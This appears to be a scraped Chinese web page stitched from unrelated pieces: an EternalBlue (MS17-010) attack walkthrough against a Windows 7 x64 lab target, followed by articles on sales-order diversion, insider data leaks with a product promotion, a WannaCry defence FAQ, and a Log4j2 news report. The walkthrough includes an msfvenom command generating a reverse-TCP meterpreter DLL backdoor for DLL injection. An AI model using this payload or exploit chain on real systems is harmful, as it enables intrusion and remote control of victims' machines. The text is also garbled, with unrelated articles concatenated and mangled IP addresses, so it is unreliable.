我估摸着这两天大家都应该被一款老旧的勒索病毒刷爆了朋友圈,可能还有些同学不幸中招,那么是什么原因导致了这款勒索病毒如此猖狂?
这件事情还得从一个黑客组织说起,这个组织叫做Equation Group(方程式组织),这一黑客团伙与美国国家安全局(NSA)的关系一直十分密切。而且外界也普遍认为,Equation Group是美国国家安全局的一个下属部门。很多安全研究专家表示,Equation Group这一黑客组织所拥有的技术无论是从复杂程度还是从其先进程度来看,都已经超越了目前绝大多数的黑客团体,而且该黑客组织已经活跃了二十多年了。
然而,这个黑客组织被另一黑客团伙“The Shadow Brokers”(影子经纪人)给入侵了……(就是这么任性)。“The Shadow Brokers”(影子经纪人)自称他们从Equation Group手里拿到了很大一部分黑客工具,决定公开叫卖。
本以为能狠赚一笔,但实际上却没有人鸟他们,就是这么神奇。于是The Shadow Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号ms17-010)。那么永恒之蓝这个漏洞利用程序究竟牛X到什么地步呢?这么说吧,除了windows 10以外,windows系列的系统无一能够幸免。
于是乎,永恒之蓝漏洞利用程序+wannacry勒索软件程序造就了迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织。
接下来,满足小白的好奇心,一起探究The Shadow Brokers公布的永恒之蓝漏洞利用程序,如何利用ms17-010攻陷一台64位windows 7。
攻击机1(1921681101):
装有metasploit的linux
攻击机2(1921681137):
可以运行The Shadow Brokers工具箱的windows xp->python26+ PyWin32 v212
靶机(1921681140):
windows 7 x64(开放139、445端口)
利用The Shadow Brokers工具箱中的永恒之蓝利用程序攻陷靶机
修改后的路径与目录当前的路径一致
一路回车,直到输入项目名称处,输入项目名称
继续回车
继续一路回车,直到选择模式选择1
继续一路回车,直至攻击完成
相关命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=1921681101 lport=4444 -f dll -o /backdoordll
一路回车,直到选择系统架构,由于我们要攻击的主机是win 7 x64位,故这里选择1
选择2 dll注入
Ps:喜欢的留个赞b( ̄▽ ̄)d ~也可以关注专题:黑客师。
有了这些做后盾,就算业务员想飞单,外商们也不答应(友情提醒:妥善保管好企业各种印章单据包括电子印章电子单据,防止被人冒用公司名义出货)。二、 恩威并施----完善奖惩、激励机制。熟手业务员的流失会给企业造成很大损失,因此留住业务员的心比留住他们的身更重要,企业若能人性化管理,以人为本,培养业务员对企业的忠诚度,做到奖惩制度合理。如果一个公司能把业务员看作是业务合作伙伴,给业务员比较优厚的待遇(如提成比率较高,优秀的业务员根据贡献享有公司股份等等)和一个宽松信任尊重的业务环境,业务员必然会十分珍惜这份工作。事先明确纪律,严禁吃里扒外,飞单行为一旦被发现,立即走人,后果严重。使业务员权衡利弊后,觉得冒很大的风险“飞单”不很值得。三、 业务流程分段经营-----隔断产品制造设计、对外联系的流程。订单的运作是一个系统的工程,如果从接订单到落单、跟单(QC)、收款,都是由一个业务员一手包办,老板、别的同事完全不清楚状况,就很容易滋生“飞单”现象。因此,调整公司的运作方式, 细化分工,内部分工明确,货源、销售、单证、物流由不同的小组处理,不失为一种比较理想的应对方式。特别是一些没有自己的生产基地,纯粹以设计和服务为主,产品的差异化又不太明显的外贸公司,对外贸流程作必要的隔断可以有效防止飞单。四、 老板深度参与外商的交流过程,多与国外客户接触,对客户需求的变化及时分析和应对。要求业务员必须处处以公司名义和国外联系,使用公司指定的邮箱,严禁业务员私自用私人邮箱来和外商联系;以公司的名义接单、出货、售后服务。目的当然是要国外客户记住的是公司,而不是某个外销员。必要的时候,外销员轮换服务客户。定时以公司名义关怀客户,如给客户定期发送产品服务问卷,一来征询客户对本公司产品和服务的认同度,以改进工作;二来,当然也是最重要的,是让客户加深对公司的印象并勘察对方定货变动情况。还可以用查询海关信息(包括出口口岸海关信息和进口国海关信息)来探询客户忽然改变定货习惯的原因,是人民币升值转移到别的国家采购,还是被“飞单”了,此法对某些垄断性特殊产品十分有效。五、 使用外贸管理软件来监控。“飞单”现象一般很难被企业管理人员发现,使用外贸管理软件将各种信息比对后,或许能发现一些“飞单”的蛛丝马迹。外贸管理软件可以帮助管理人员掌握客户资源和业务流程的各种信息,如定单的执行情况、货款的回收情况等等。(完)1 高速信息化时代,工作生活提供极大便利,随之身边也存在很多安全隐患,需要我们自己引起重视。2 树立自我安全意识,不是在工作生活中由领导父母强加给我们的,而是自己意识到安全很重要。
3 面对生活工作中事故,突出预警预防,谋事在先。
4 在工作中,了解相关安全法律,才能知道怎样有效预防与合理处理,有一些关于生活安全常识和生活安全标识,要懂得区分,提高警惕。
5 掌握知识后需要实践,才能真正遇到安全事故,做到合理有效运用,避免在实际生活或工作中,安全事故如果发生,也可将事故及时有效制止或将损失降到最低。
6 我们树立安全意识,掌握必要知识,也做了实际安全演练,可以把知道的安全知识以及实际 *** 作教会身边工作中的伙伴,生活中的家人,同时也加强自己对安全知识理解与提升自我实际 *** 作能力。离职人员泄密途径以及防范之道
离职人员泄密途径有很多,就商业秘密或者工作秘密而言,离职人员泄密途径主要有三种:
1、收买
不得不说有一些员工禁不住糖衣炮d的诱惑,私下拿单位的内部机密信息来换取非法利益,这种情景也很常见。一般来讲,员工跳槽或多或少会带走一些原单位的信息,这是不可避免的。然而企业要避免一些恶意跳槽,比如竞争对手有预谋的收买而引起的,跳槽本身就是盗走资料。
2、管理疏忽
由于惯性,企业很难发现内部保密管理漏洞,这就容易被外来竞争者恶意利用,比如企业安全信息管理制度不完善。
3、计算机使用管理制度漏洞
与计算机网络相关的漏洞很容易引来网络黑客,他们可能利用社交工程学方法,使用虚假身份、钓鱼邮件和克隆网站,骗取公司内部员工提供机密信息,或内部人员身份,长期潜伏和窃取机密。
防范竞争者收买或管理疏忽窃密,防止员工离职后“另起炉灶”或者“自立门户”窃取信息,要注意严把员工入职关,保密泄密必须签;教育培训经常“搞”,离职跳槽先约谈。具体来讲,有如下措施。
一、严把入职关
对掌握关键技术和秘密的岗位人员,要从入职考察、考核抓起、严格审查、考核,选用可靠忠诚、职业心责任心事业心强的员工。
二、签订保密协议
新老员工都需要签订保密协议。明确规定员工保密的具体内容、具体责任、保密期间、泄密的法律追究等内容。
三、商业秘密教育
很多人签字也不会认真对待,员工有意无意的上网行为,误点了钓鱼网站,导致局域网招致网络蠕虫病毒甚至网络瘫痪,给公司造成严重损失。因此,进行保密宣传教育和培训是非常有必要的。采取集中教育或者个别约谈教育相结合的方式,使员工的保密教育培训经常化、制度化。要以保密法律法规教育,泄密泄密案例教育,企业商业秘密范围和保护商业秘密知识教育等为重点,使员工明确自己的保密责任、泄密的后果,认清保密形式,客户侥幸心理,做到警钟长鸣。
四、离职员工离职约谈
约谈内容主要是重温保密协议法律法规的规定,诉诸法律,挽回或减少损失。
对于入侵式窃密,在保密管理方面要加强漏洞的修复,比如,使用域之盾。泄密途径的安全威胁来自组织内部人为的泄密,剩下的15%是木马入侵,网络、笔记本硬盘丢失和通信端口泄密等等,所以防治内部人员泄密是关键。
域之盾用于保护企业内部文档不外泄,同时规范员工的计算机 *** 作行为。
域之盾主要功能包括:强制自动加密、内容保护、透明使用、泄密控制、审批管理、离线文档管理、外发文档管理、邮件关键字筛选、审计微信qq外发文件、文件访问管理、事件追踪、文档安全管理、行为审计、内网桌面管理、网络安全管理、打印审计、U盘管理等。
软件由服务器端、客户端、管理端三部分组成。无需值守,管理成本低。
服务器端安装在长开机的服务器电脑上,控制台程序安装在管理员使用的电脑上,终端程序安装在每个需要文档保护或者需要阅读加密文档的员工电脑上。
1、官网获取“域之盾”安装包,如下图所示
2、解压安装包到当前文件夹,下图是“域之盾”安装包解压中。
3、解压后获得软件,双击下图软件,安装,如下图所示
4、安装好软件以后,安装控制台。
5、服务器端和控制端安装在同一台电脑上
6、选择安装路径
7、点击安装,下图是软件安装中
8、点击“完成”,软件就安装好了。
9、 进入“域之盾”首页,所有功能一览无遗。
加密功能(1)透明加密
加密过程自动完成、不影响用户使用习惯
透明加密:在文件创建或编辑过程中自动强制加密,对用户 *** 作习惯没有任何影响,不需手动输入密码。当文件通过非正常 渠道流至外部,打开时会出现乱码或无法打开,并且始终处于 加密状态。加密过程在 *** 作系统内核完成,保证了加密的高效 性。
半透明加密:用户可以打开加密文件,新建的文件不加密。
(2)解密审批
解密外发:当与外部交流,需要解密文件,员工可以通过申请 解密文件,管理人员受到申请信息,根据收到申请解密文件, 决定是否通过审批。可以设置多人审批,分级审批等流程。
防泄密外发:当员工外发重要文件时,可以向管理员申请外发 ,同时可以设置外发出去的文件的打开次数,打开时间,是否 可以打印、截屏等 *** 作。可以设置多人审批,分级审批等流程。
(3)权限管理
通过划分安全区域、设置文档密级,建立分部门分级别的保密机制
文件密级管理:域之盾加密系统率先引入了“密级”的概念,根据保密制度和策略,通过部门、密级、文档类型的相关联, 细化到各部门加密的不同文件类型,划分“公开”、“普通”、“私密”、“保密”、“机密”、“绝密”六个等级。 每个部门有单独的权限,不同部门之间默认不可互相访问,可以根据需求进行一些必要的设置和授权。
(4)客户端管理
剪贴板控制:受自动加密保护的文件,具有剪贴板防护的功能和控制。例如,WORD为受保护的文件,无法将WORD文件中的内容拷贝到聊天对话框和其它编辑工具内,但是可以将其他类型的文件内容复制到WORD文档中来。
自动加解密:按照透明加解密策略,自动加解密文件。对于加密保护的文件,无法通过任何复制、粘贴、拖拽等方式,利用邮件、即时通讯工具等非受信任的执行程序带出到企业以外。
禁止截屏:防止截屏(包括系统截屏,QQ截屏,搜狗截屏等其他第三方截屏软件)。
(5)离线管理
确保出差人员加密文档的安全
离线用户管理(长期):若员工不能够与企业内网中的服务器相连,可以利用单机客户端的方式。
离线用户管理(短期):若员工临时出差在外,可以通过离线策略对其进行管理。设置员工离线的时间,比如72小时,当计算机离线大于72小时后,所有加密文件将不能打开。
(6)邮件白名单
用户发送你家内白名单中的邮箱地址,文件自动解密
发件人白名单:管理员可以设置发件人白名单,白名单中的发件人发出的邮件中的附件会自动解密。
收件人白名单:管理员可以设置收件人白名单,白名单中的收件人收到的邮件中的附件会自动解密。
1、小白用户如何防御这个勒索病毒?
请广大用户无需过度担心,安装“火绒安全软件”即可防御这个勒索病毒,以及新出现的变种。同时,请给 *** 作系统升级、安装补丁程序(详情见下文)。
5月13日周六中午,“火绒安全软件”就已经完成紧急升级,通过火绒官网下载软件,升级到最新版本即可防御、查杀该病毒。
火绒团队正在日夜值守,持续跟踪新的病毒变种,一旦遇到新变种会随时升级产品。火绒产品默认自动升级,请广大用户放心使用,无需做任何设置。
内网用户请通过外网下载火绒产品升级到最新版本,然后覆盖安装内网电脑即可。
2、哪些用户容易被感染,为什么政府机关和大学是重灾区?
我们发现,目前这个病毒通过共享端口传播,除了攻击内网IP以外,也会在公网进行攻击。但是,只有直接暴露在公网且没有安装相应 *** 作系统补丁的计算机才会受到影响,因此那些通过路由拨号的个人用户,并不会直接通过公网被攻击。如果企业网络也是通过总路由出口访问公网的,那么企业网络中的电脑也不会受到来自公网的直接攻击,但并不排除病毒未来版本会出现更多传播渠道。
很多校园网或其他网络存在一些直接连接公网的电脑,而内部网络又类似一个大局域网,因此一旦暴露在公网上的电脑被攻破,就会导致整个局域网存在被感染的风险。
根据“火绒威胁情报系统”的数据,互联网个人用户被感染的并不多。
3、已经被感染用户,能否恢复被加密锁死的文件?
结论:这非常难,几乎不可能,即使支付赎金,也未必能得到解密密钥。
A、 相比以往的勒索病毒,这次的WannaCry病毒存在一个致命缺陷——病毒作者无法明确认定哪些受害者支付了赎金,因此很难给出相应的解密密钥(密钥是对应每一台电脑的,没有通用密钥)。
请不要轻易支付赎金(比特币),如上所述,即使支付了赎金,病毒作者也无法区分到底谁支付赎金并给出相应密钥。
B、 网上流传一些“解密方法”,甚至有人说病毒作者良心发现,已经公布了解密密钥,这些都是谣言。这个勒索病毒和以往的绝大多数勒索病毒一样,是无法解密的,请不要相信任何可以解密的谎言,防止上当受骗。
C、 某些安全公司也发布了解密工具,其实是“文件修复工具”,可以有限恢复一些被删除的文件,但是依然无法解密被锁死的文件。
4、这个勒索病毒会攻击哪些系统?
答:这次病毒爆发影响确实非常大,为近年来所罕见。该病毒利用NSA“永恒之蓝”这个严重漏洞传播,几乎所有的Windows系统如果没有打补丁,都会被攻击。
微软在今年 3 月发布了 MS17-010 安全更新,以下系统如果开启了自动更新或安装了对应的更新补丁,可以抵御该病毒——Windows
Vista、Windows Server 2008、Windows 7、Windows Server 2008 R2、Windows
81、Windows Server 2012、Windows 10、Windows Server 2012 R2、Windows Server
2016 。
最安全的是Windows 10 的用户,该系统是是默认开启自动更新且无法关闭的,所以不会受该病毒影响。
另外:由于此次事件影响巨大,微软破天荒的再次为已经不在维护期的Windows XP、Windows 8和 Windows Server 2003 提供了紧急安全补丁更新。
5、除了Windows系统的电脑外,手机、Pad、Mac等终端是否会被攻击?
答:不会的,病毒只攻击Windows系统的电脑,手机等终端不会被攻击,包括Unix、Linux、Android等系统都不会受影响。
详细教程
安恒信息高级应急响应总监季靖评价称:“(Apache Log4j2)降低了黑客攻击的成本,堪称网络安全领域20年以来史诗级的漏洞。”有业内人士还认为,这是“现代计算机 历史 上最大的漏洞”。
工信部于2021年12月17日发文提示风险:“阿帕奇Log4j2组件存在严重安全漏洞……该漏洞可能导致设备远程受控,进而引发敏感信息窃取、设备服务中断等严重危害,属于高危漏洞。”
就连国家政府部门也中招了。2021年12月下旬,比利时国防部承认他们遭受了严重的网络攻击,该攻击基于Apache Log4j2相关漏洞,网络攻击导致比利时国防部包括邮件系统在内的一些业务瘫痪。
此漏洞“威力”之大,连国家信息安全也受到波及。那么普通企业,特别是采用云服务的企业应该如何应对呢?疫情发生以来,大量企业、机构加速数字化进程,成为“云上企业”。传统环境下,企业对自身的安全体系建设拥有更多掌控权,完成云迁移后,这些企业的云安全防护是否到位?
2021年12月9日深夜,Apache Log4j2远程代码执行漏洞攻击爆发,一时间各大互联网公司“风声鹤唳”,许多网络安全工程师半夜醒来,忙着修补漏洞。“听说各大厂程序员半夜被叫起来改,不改完不让下班。”相关论坛也对此事议论纷纷。
为何一个安全漏洞的影响力如此之大?安永大中华区网络安全与隐私保护咨询服务主管合伙人高轶峰认为:“影响广泛、威胁程度高、攻击难度低,使得此次Apache Log4j2漏洞危机备受瞩目,造成了全球范围的影响。”
“Log4j2是开源社区阿帕奇(Apache)旗下的开源日志组件,被全世界企业和组织广泛应用于各种业务系统开发”,季靖表示,“据不完全统计,漏洞爆发后72小时之内,受影响的主流开发框架都超过70个。而这些框架,又被广泛使用在各个行业的数字化信息系统建设之中,比如金融、医疗、互联网等等。由于许多耳熟能详的互联网公司都在使用该框架,因此阿帕奇Log4j2漏洞影响范围极大。”
除了应用广泛之外,Apache Log4j2漏洞被利用的成本相对而言也较低,攻击者可以在不需要认证登录这种强交互的前提下,构造出恶意的数据,通过远程代码对有漏洞的系统执行攻击。并且,它还可以获得服务器的最高权限,最终导致设备远程受控,进一步造成数据泄露,设备服务中断等危害。
不仅仅攻击成本低,而且技术门槛也不高。不像2017年爆发的“永恒之蓝”,攻击工具利用上相对复杂。基于Apache Log4j2漏洞的攻击者,可以利用很多现成的工具,稍微懂点技术便可以构造更新出一种恶意代码。
利用难度低、攻击成本低,意味着近期针对Apache Log4j2漏洞的攻击行为将还会持续一段时间,这将是一场“网络安全大流感”。
传统模式下,安全人员可以在本地检测、打补丁、修复漏洞。相对于传统模式,“云上企业”使用的是云计算、云存储服务等,没有自己的机房和服务器。进入云环境,安全防护的“边界”不复存在,对底层主机的控制权限也没有本地那么多,同时还多一层虚拟化方面的攻击方式。
特别是疫情影响下,大量企业、机构开启数字化转型,从本地服务器迁徙到云服务器。短时间内完成云迁移,企业很可能缺乏对应的云安全管理能力成熟度;同时,往往也面临着安全能力不足、专业人手紧缺等情况。
面对这场史诗级的漏洞危机,“云上企业”应该如何应对呢?
在安恒信息高级产品专家盖文轩看来:“企业上云之后,传统的网络安全风险依然存在,此外,还会面临新的安全风险,比如用户与云平台之间安全责任边界划分等问题。另外,传统的硬件设备可能不适用于云环境,因此需要针对特殊情况部署相关安全服务。”
而在安永大中华区 科技 风险咨询服务合伙人赵剑澐看来:“面对快速上云,企业急需搭建满足自身业务发展与管理要求的安全保障体系。”
那么,对于这些“云上企业”,究竟是选择云服务商提供的原生安全服务,还是另寻第三方专业的安全服务商呢?
事实上,目前即使是高度自动化的云原生安全方案,也无法做到完全自主自治,仍然需要合格的云安全服务专业团队参与。高轶峰强调,对于中小型企业,选择满足资质的第三方专业安全机构,能够保证服务的独立性,保障工作顺利开展及服务质量。
每日经济新闻
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)